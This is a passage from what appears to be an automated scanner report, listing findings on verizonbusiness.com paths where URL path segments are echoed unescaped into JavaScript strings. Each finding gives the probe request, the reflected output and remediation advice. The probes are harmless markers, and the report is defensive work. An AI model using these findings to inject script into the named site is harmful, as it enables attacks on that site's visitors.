Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions4b355';36a4f30df9b/byindustry/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.878. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8322"%3bbe69c229289 was submitted in the REST URL parameter 1. This input was echoed as d8322";be69c229289 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd8322"%3bbe69c229289/byindustry/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:32 GMT
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsd8322";be69c229289/byindustry/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.879. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37469"%3bf318f02565e was submitted in the REST URL parameter 2. This input was echoed as 37469";f318f02565e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byindustry37469"%3bf318f02565e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:54 GMT
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byindustry37469";f318f02565e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.880. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e2d4'%3bb381d26f8ba was submitted in the REST URL parameter 2. This input was echoed as 2e2d4';b381d26f8ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byindustry2e2d4'%3bb381d26f8ba/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:59 GMT
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byindustry2e2d4';b381d26f8ba/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.881. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d271a"%3b4ce5826d283 was submitted in the REST URL parameter 1. This input was echoed as d271a";4ce5826d283 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd271a"%3b4ce5826d283/byneed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:51 GMT
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsd271a";4ce5826d283/byneed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.882. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc9a8'%3b1f82b645b2a was submitted in the REST URL parameter 1. This input was echoed as bc9a8';1f82b645b2a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsbc9a8'%3b1f82b645b2a/byneed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutionsbc9a8';1f82b645b2a/byneed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.883. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a31e"%3bafd3cb154f3 was submitted in the REST URL parameter 2. This input was echoed as 4a31e";afd3cb154f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed4a31e"%3bafd3cb154f3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:08 GMT
Content-Type: text/html
Content-Length: 41844
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed4a31e";afd3cb154f3/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.884. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df793'%3b029ff1e7e97 was submitted in the REST URL parameter 2. This input was echoed as df793';029ff1e7e97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneeddf793'%3b029ff1e7e97/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41844
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneeddf793';029ff1e7e97/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.885. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bead7"%3b82c8577c6a1 was submitted in the REST URL parameter 1. This input was echoed as bead7";82c8577c6a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsbead7"%3b82c8577c6a1/byneed/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsbead7";82c8577c6a1/byneed/agility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.886. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eb40'%3b53d34285cd7 was submitted in the REST URL parameter 1. This input was echoed as 4eb40';53d34285cd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions4eb40'%3b53d34285cd7/byneed/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:30 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions4eb40';53d34285cd7/byneed/agility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.887. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58b9c'%3b29abc4185c4 was submitted in the REST URL parameter 2. This input was echoed as 58b9c';29abc4185c4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed58b9c'%3b29abc4185c4/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41862
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed58b9c';29abc4185c4/agility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.888. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b8ea"%3ba4fd2bf2f2f was submitted in the REST URL parameter 2. This input was echoed as 5b8ea";a4fd2bf2f2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed5b8ea"%3ba4fd2bf2f2f/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:37 GMT
Content-Type: text/html
Content-Length: 41862
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed5b8ea";a4fd2bf2f2f/agility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.889. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b903e'%3b56a8961dbbd was submitted in the REST URL parameter 3. This input was echoed as b903e';56a8961dbbd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/agilityb903e'%3b56a8961dbbd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41914
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/agilityb903e';56a8961dbbd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.890. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15872"%3b8ce0ad004f1 was submitted in the REST URL parameter 3. This input was echoed as 15872";8ce0ad004f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/agility15872"%3b8ce0ad004f1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
